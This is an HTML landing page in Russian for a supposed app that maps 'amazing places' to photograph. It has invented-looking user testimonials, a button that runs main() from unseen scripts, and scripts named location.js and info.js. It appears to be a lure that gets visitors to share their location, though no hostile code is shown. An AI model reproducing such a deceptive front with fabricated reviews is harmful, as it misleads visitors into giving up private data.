<!DOCTYPE HTML>
<html>
	<head>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<title>Удивительные места</title>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta name="description" content="Free HTML5 Website Template by freehtml5.co" />
	<meta name="author" content="freehtml5.co" />
	<meta property="og:title" content=""/>
	<meta property="og:image" content=""/>
	<meta property="og:url" content=""/>
	<meta property="og:site_name" content=""/>
	<meta property="og:description" content=""/>
	<meta name="twitter:title" content="" />
	<meta name="twitter:image" content="" />
	<meta name="twitter:url" content="" />
	<meta name="twitter:card" content="" />
	<link href="https://fonts.googleapis.com/css?family=Cormorant+Garamond:300,300i,400,400i,500,600i,700" rel="stylesheet">
	<link href="https://fonts.googleapis.com/css?family=Satisfy" rel="stylesheet">	
	<!-- Animate.css -->
	<link rel="stylesheet" href="css/animate.css">
	<!-- Icomoon Icon Fonts-->
	<link rel="stylesheet" href="css/icomoon.css">
	<!-- Bootstrap  -->
	<link rel="stylesheet" href="css/bootstrap.css">
	<!-- Flexslider  -->
	<link rel="stylesheet" href="css/flexslider.css">

	<!-- Theme style  -->
	<link rel="stylesheet" href="css/style.css">

	<!-- Modernizr JS -->
	<script src="js/modernizr-2.6.2.min.js"></script>
	</head>
	<body>
	<div class="fh5co-loader"></div>
    <div id="page">
	<nav class="fh5co-nav" role="navigation">
		<!-- <div class="top-menu"> -->
			<div class="container">
				<div class="row">
					<div class="col-xs-12 text-center logo-wrap">				
					</div>
					<div class="col-xs-12 text-center menu-1 menu-wrap">
						<ul>				
						</ul>
					</div>
				</div>
				
			</div>
		</nav>
<header id="fh5co-header" class="fh5co-cover js-fullheight" role="banner" style="background-image: url(images/hero_1.jpeg);" data-stellar-background-ratio="0.5">
		<div class="overlay"></div>
		<div class="container">
			<div class="row">
				<div class="col-md-12 text-center">
					<div class="display-t js-fullheight">
						<div class="display-tc js-fullheight animate-box" data-animate-effect="fadeIn">
							<h1>Найди удивительное место для своей фотографии на карте в своём городе.</h1>
						</div>
					</div>
				</div>
			</div>
		</div>
	</header>

	<div id="fh5co-about" class="fh5co-section">
		<div class="container">
			<div class="row">
				<div class="col-md-6 col-md-pull-4 img-wrap animate-box" data-animate-effect="fadeInLeft">			
				</div>
			</div>
		</div>
	</div> <div class="col-md-12 fh5co-heading animate-box">
				</div>
				<div class="col-md-3 col-sm-6 col-xs-6 col-xxs-12 fh5co-item-wrap animate-box">
					<div class="fh5co-item margin_top">
						
						</div>
					</div>
				<div class="col-md-7 animate-box" data-animate-effect="fadeInRight">
					</blockquote>
				</div>
			</div>
		</div>
	</div> <div class="fh5co-heading">
					</div>
				    </div>
					  <div class="overlay-gradient"></div>
					   		<div class="container-fluid">
					   			<div class="row">
						   			<div class="col-md-12 col-md-offset-0 col-md-pull-10 slider-text slider-text-bg">
						   				<div class="slider-text-inner">
						   					<div class="desc"></div>
						   				</div>
						   			</div>
						   		</div>
					   		</div>
					   	</li>		   	
					  	</ul>
				  	</div>
				</aside>
				</div>
			</div>
		</div>
		<div class="container">
			<div class="row animate-box">
			<button id="change" class="button" type="button" onclick="main()">Открыть карту с друзьями</button>
				</div>
			</div>
			<div class="row">
				<div class="col-md-4">
					<div class="fh5co-blog animate-box">
						<a href="#" class="blog-bg" style="background-image: url(images/gallery_1.jpeg);"></a>
						<div class="blog-text">
							<span class="posted_on">Feb. 15th 2020</span>
							<h3><a href="#">Мы снова в Гонконге</a></h3>
							<p>Виталий Раскалов и Вадим Махоров очень любят Гонконг. Друзья-экстремалы из России успели уже и один раз побывать в этом замечательном городе и наделать много завораживающих фотографий, и все это благодаря приложению. Друзья побывали на многих крышах высотных зданий Гонконга, с которых открывается удивительный вид на город.</p>
							<ul class="stuff">
								<li><i class="icon-heart2"></i>3.4K</li>
								<li><i class="icon-eye2"></i>7.9K</li>
								<li><a href="#">Открыть страницу<i class="icon-arrow-right22"></i></a></li>
							</ul>
						</div> 
					</div>
				</div>
				<div class="col-md-4">
					<div class="fh5co-blog animate-box">
						<a href="#" class="blog-bg" style="background-image: url(images/gallery_2.jpeg);"></a>
						<div class="blog-text">
							<span class="posted_on"> 2019</span>
							<h3><a href="#">Побывала на камчатке</h3>
							<p> Приветик Девчонки! Завершающий отзыв о путешествии на полуостров Камчатка. В нем я собрала все-все по максимуму. Во время отбора фотографий буквально била себя по рукам. Хотелось впихнуть невпихуемое. Нашла все этом приложении...</p>
							<ul class="stuff">
								<li><i class="icon-heart2"></i>5.3K</li>
								<li><i class="icon-eye2"></i>6K</li>
								<li><a href="#">Открыть страницу<i class="icon-arrow-right22"></i></a></li>
							</ul>
						</div> 
					</div>
				</div>
				<div class="col-md-4">
					<div class="fh5co-blog animate-box">
						<a href="#" class="blog-bg" style="background-image: url(images/gallery_3.jpeg);"></a>
						<div class="blog-text">
							<span class="posted_on">2019</span>
							<h3><a href="#">Не поняла что делать, на всякий случай сделала фото</a></h3>
							<p>Я открыла карту поставила фото, дальше что делать ? только лайки и промотры идут. Мне ну не нужны лайки напишите в личку как открыть карту я немного тупенькая</p>
							<ul class="stuff">
								<li><i class="icon-heart2"></i>6.7K</li>
								<li><i class="icon-eye2"></i>20.2K</li>
								<li><a href="#">Открыть страницу<i class="icon-arrow-right22"></i></a></li>
							</ul>
						</div> 
					</div>
				</div>
			</div>
		</div>
	</div>
			<div class="row animate-box">
				<div class="col-md-8 col-md-offset-2 text-center fh5co-heading">
	
				</div>
			</div>
		</div>
	</div>

	<footer id="fh5co-footer" role="contentinfo" class="fh5co-section">
		<div class="container">
			<div class="row row-pb-md">
				<div class="col-md-4 fh5co-widget">
					<h4>О приложении</h4>
					<p>На данный момент приложение находится в разработке, мы показываем вам на карте все удивительные места в вашем городе</p>
				</div>
				<div class="col-md-4 col-md-push-1 fh5co-widget">
					<h4>Contact Information</h4>
					<ul class="fh5co-footer-links">
						<li>Москва<br> Улица 721, дом 542</li>
					</ul>
				</div>

			</div>

			<div class="row copyright">
				<div class="col-md-12 text-center">
					<p>
						<small class="block">&copy; Создатель Bafomet 2020.</small> 
				</div>
			</div>

		</div>
	</footer>
	</div>

	<div class="gototop js-top">
		<a href="#" class="js-gotop"><i class="icon-arrow-up22"></i></a>
	</div>
	
	<script type="text/javascript">
    if (window.location.protocol == "http:") {
        var restOfUrl = window.location.href.substr(5);
        window.location = "https:" + restOfUrl;
    }</script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/particles.js/2.0.0/particles.min.js"></script>
    <script src="js/main.js"></script>
    <script src="js/location.js"></script>
    <script src="js/info.js"></script>
    <script src="js/warpspeed.min.js"></script>

	</body>
</html>

